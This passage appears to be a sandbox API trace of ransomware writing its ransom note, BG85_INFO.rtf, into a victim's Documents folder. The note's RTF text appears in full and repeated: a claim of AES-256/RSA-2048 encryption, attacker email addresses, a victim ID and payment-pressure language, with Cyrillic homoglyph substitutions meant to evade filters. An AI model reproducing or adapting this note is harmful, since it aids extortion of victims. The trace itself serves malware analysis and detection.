w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n¤#9#,&«\x1e­\x8c…?4kP@<õL\x88f#Öã\x9b\x1d\x8e\x8c¥Ù\x09,Z/µ×jd0\x88\x9d]8ÏgNFâ.Ä4ìïÎ1ð£\x0bkzsµ³[÷\x96\x1d\x0eÖ\x97\x8d\x07q?G\x16~\x03\x13\x88ª#C6ôaK=\x96\x0f%ǨæúpW¼\x88²pµ´ò{Îî(sÛ\x1cC\x01þáý\x9aYf}\x1e\x13£1/ø¡r$oÛ\x03Û/¤ê\x83\x0b{¸zu\x9c%2±VX*P\x1dZ\x95´Ñ-\x835\x8c\x8a¶ \"èÃÐì'\n\x91\x9ee<\rÜ.ß0©Ö\x18ù\x1b!o\x8aͶ\x1a\x1cnô\x04\x80´*+¯~ÐJ9*à²9+|¨ð\x1eò\x98Ó\x0b", lpUsedDefaultChar=0x0) returned 7247 [0067.822] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0067.823] CloseHandle (hObject=0x1dc) returned 1 [0067.824] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g155gr\\bg85_info.rtf")) returned 0xffffffff [0067.824] GetLastError () returned 0x2 [0067.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g155gr\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.824] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 